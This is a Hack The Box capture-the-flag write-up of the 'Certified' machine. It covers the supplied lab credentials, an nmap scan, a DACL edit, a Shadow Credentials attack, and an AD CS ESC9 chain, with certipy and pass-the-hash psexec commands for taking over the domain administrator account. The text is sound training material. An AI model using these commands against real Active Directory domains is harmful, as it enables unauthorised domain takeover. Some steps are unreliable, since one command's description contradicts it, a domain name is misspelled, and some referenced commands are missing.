Hack The Box: Certified Machine Walkthrough – Medium Difficulty

Introduction to Certified:

This writeup explores the “Certified” machine from Hack The Box, a medium-difficulty challenge. It covers reconnaissance, exploitation, and privilege escalation steps needed to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Certified” machine from Hack The Box. To achieve this, we will systematically follow a structured approach while addressing key objectives, ensuring efficiency and clarity throughout the process.

User Flag:

Initial Access

The initial foothold is obtained using the credentials (judith.mader**:judith09**), which enable authentication and enumeration of network resources. As a result, we can now proceed with privilege escalation techniques.

Privilege Escalation to Management Account

To escalate privileges, Certipy is utilized to perform a Shadow Credentials attack, specifically targeting the management_svc account. This attack manipulates authentication settings, ultimately granting control over the targeted account. Once the necessary credentials are obtained, Evil-WinRM is used to establish a remote session with the machine by leveraging NTLM hashes.

Finally, we can retrieve the user flag by executing the following command:

type user.txt

Root Flag:

Exploiting Certificate Services for Privilege Escalation

The next phase involves Active Directory Certificate Services (AD CS) exploitation. This attack begins by modifying the User Principal Name (UPN) of the ca_operator account to Administrator using Certipy. Consequently, this allows us to request a certificate under the Administrator identity, effectively granting elevated privileges.

After altering the UPN, the next step is to request a vulnerable ESC9 certificate. Notably, by omitting ca_operator’s original domain, the issued certificate lacks the Security Identifier (SID) linking it to ca_operator, making it functionally equivalent to an Administrator certificate.

Once the certificate is successfully obtained, the UPN of ca_operator is restored to its original state to minimize detection. The newly acquired certificate is then used to authenticate with Kerberos, thereby retrieving the NT hash of the Administrator account.

To confirm privilege escalation, the root flag is retrieved by executing the following command:

type root.txt

Enumerating the Certified Machine

Reconnaissance:

Nmap

Nmap Scan:

A network scan is initiated to identify open ports and running services on the target machine.

nmap -sC -sV -oN nmap_initial.txt 10.10.11.41

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/certified]
└──╼ $nmap -sC -sV -oA initial -Pn 10.10.11.41
# Nmap 7.94SVN scan initiated Thu Mar 13 06:10:04 2025 as: nmap -sC -sV -oA initial -Pn 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.17s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-13 17:10:20Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-13T17:11:44+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-03-13T17:11:45+00:00; +7h00m00s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-13T17:11:44+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-03-13T17:11:45+00:00; +7h00m00s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-03-13T17:11:04
|_  start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 13 06:11:46 2025 -- 1 IP address (1 host up) scanned in 101.72 seconds

Key Findings from Nmap Scan:

• 53/tcp (DNS) – Simple DNS Plus is running, likely providing name resolution for the domain.
• 88/tcp (Kerberos) – Kerberos authentication is active, confirming a Windows domain controller.
• 135/tcp (MSRPC) & 593/tcp (RPC over HTTP) – Remote procedure calls (RPC) for Windows services and administrative tasks.
• 139/tcp & 445/tcp (SMB/NetBIOS) – File sharing and authentication mechanisms, potentially exploitable for SMB relay or credential theft.
• 389/tcp & 636/tcp (LDAP & LDAPS) – Active Directory LDAP services are available for querying domain objects, with
• 636/tcp supporting secure connections (SSL).
• 464/tcp (kpasswd5) – Used for Kerberos password changes, indicating password management capabilities for domain users.
• 3268/tcp & 3269/tcp (Global Catalog LDAP) – Active Directory Global Catalog ports facilitate domain-wide searches.

Exploitation on Certified Machine

To proceed effectively, HackTheBox has provided these credentials, which should be leveraged for enumeration and privilege escalation.

• Username: judith.mader
• Password: judith09

crackmapexec enumeration

Gathering Credentials Using CrackMapExec

We leverage CrackMapExec with the SMB module to enumerate users.

Identified Usernames:

Administrator
Guest
krbtgt
DC01$
judith.mader
management_svc
ca_operator
alexander.huges
harry.wilson
gregory.cameron

Using BloodHound for Privilege Escalation Analysis

BloodHound is used to analyze the extracted data and identify potential attack paths and privilege escalation opportunities.

Analysis using BloodHound on Certified Machine

The command above will retrieve information about the machine.

Modify the ACL of the Management group to grant the user judith.mader the WriteMembers permission, allowing them to manage the group’s members.

What is DACLedit?

DACLs manage permissions for objects like files, folders, and Active Directory components. They can be modified through the use of:

• PowerShell (Set-Acl, icacls, dsacls)
• Graphical interfaces (Active Directory Users and Computers, Advanced Security Settings)
• Third-party utilities for permission management

Enumeration on Certified Machine

Modifying ACLs Using Impacket

Using Impacket, we modify the DACL of the MANAGEMENT group in Active Directory, granting Judith Mader permission to manage group membership. This is done by assigning the WriteMembers privilege.

Key Steps:

• Modify Group Membership – Enables privilege escalation.
• Grant WriteMembers Permission – Allows Judith to modify the group members.
• Authenticate Using Judith’s Credentials – Provides necessary authorization.

First, retrieve the management_svc credentials using a Shadow Credentials attack. After obtaining these credentials, leverage them along with the associated hash to escalate privileges. Ultimately, this progression enables the successful targeting of ca_operator.

Trying the enumeration using pywhisker and gettgptpkinit script

Next, request a TGT (Ticket Granting Ticket) for management_svc.

Use the appropriate script from PKINITtools, gettgtpkinit.py, to request a Kerberos TGT by leveraging the previously generated certificate and key.

Alternative Methods: Certipy for AD CS Exploitation

To overcome specific challenges, an alternative approach involves leveraging Certipy to exploit Active Directory Certificate Services (AD CS). Certipy allows for:

• Obtaining an administrator certificate to escalate privileges.
• Requesting a Kerberos TGT using a previously generated certificate.
• Performing a Shadow Credentials Attack to manipulate authentication settings.

A little explanation on the Certipy script

Certipy is a security tool designed for assessing Active Directory Certificate Services (AD CS). It helps penetration testers systematically enumerate, request, and exploit misconfigured certificates for privilege escalation. Often utilized as an alternative to PKINITtools, Certipy plays a crucial role in identifying and leveraging weaknesses in certificate-based authentication within Active Directory.

Certipy can be utilized to execute a Shadow Credentials attack, which, in turn, allows an attacker to modify authentication settings and, consequently, gain access to another user’s account. Furthermore, by first authenticating as Judith Mader (judith.mader@certified.htb, password: judith09), the attacker can then strategically target the management_svc account, thereby gaining control and further escalating privileges.

We can use Evil-WinRM along with the previously obtained username and hashes to gain access to the machine.

We can retrieve the user flag by executing the command type user.txt in the terminal.

Escalate to Root Privileges Access on Certified Machine

Privilege Escalation:

The SVC account has full administrative control over the CA_OPERATOR account, granting it the ability to manage and modify its permissions, settings, and associated resources.

Certipy deeper exploitation

It utilizes Certipy to interact with Active Directory Certificate Services (AD CS), logging in as management_svc@certified.htb using a hashed password. By specifying the ca_operator role, it attempts to gain certificate-related privileges, potentially allowing the creation or manipulation of authentication certificates. The target system, 10.10.11.41, is a domain controller, which manages network authentication.

With full control over the ca_operator account, we proceed with the final privilege escalation steps:

• Modify the UPN of ca_operator to Administrator:
  • certipy-ad account update -username management_svc@$domain -hashes :$svcHash -user ca_operator -upn Administrator
• Request a vulnerable certificate:
  • certipy-ad req -username ca_operator.$domain -hashes :$caHash -ca certified-DC01-CA -template CertifiedAuthentication -debug
• Authenticate using the obtained certificate and retrieve the NT hash:
  • certipy-ad auth -pfx administrator.pfx -domain $domain
• Use PsExec for remote execution on the Domain Controller (DC01):
  • psexec \dc01 -u Administrator -H <NTLM Hash> cmd.exe
• Retrieve the root flag:
  • type root.txt

To modify the User Principal Name (UPN) of the ca_operator account to Administrator, execute the following command:

certipy-ad account update -username management_svc@$domain -hashes :$svcHash -user ca_operator -upn Administrator

This command updates the UPN associated with the ca_operator account, effectively changing its identity to Administrator within the domain.

To request a vulnerable certificate using the ca_operator account, we utilize the CertifiedAuthentication certificate template.

certipy-ad req -username ca_operator.$domain -hashes :$caHash -ca certified-DC01-CA -template CertifiedAuthentication -debug

Since the User Principal Name (UPN) of ca_operator was previously modified to Administrator, the requested certificate is issued with the Administrator’s UPN. Additionally, by omitting the original ca_operator domain, the resulting certificate is generated without the Security Identifier (SID) of ca_operator. This approach allows for the creation of a certificate that effectively grants elevated privileges under the Administrator identity, bypassing standard security controls and avoiding direct association with the original ca_operator account.

Comprehensive Guide to Privilege Escalation

To modify the User Principal Name (UPN) of the ca_operator account to Administrator, the following command is executed:

certipy-ad account update -username management_svc@$domain -hashes :$svcHash -user ca_operator -upn ca_operator@certfied.htb -dc-ip 10.10.11.41

This command updates the UPN associated with ca_operator, effectively changing its identity to Administrator within the domain.

To successfully authenticate with the obtained certificate and subsequently retrieve the Administrator’s NT hash, you need to execute the following command.

certipy-ad auth -pfx administrator.pfx -domain $domain

Using the tool, authenticate to Kerberos as a user by leveraging a certificate file.

Getting root flag on Certified Machine

This command allows remote execution on the Domain Controller (DC01) using PsExec, a powerful tool for interacting with Windows systems. It explicitly designates the Administrator account for authentication while simultaneously leveraging the NTLM hash rather than a plaintext password.

We can retrieve the root flag by executing the command type root.txt in the terminal.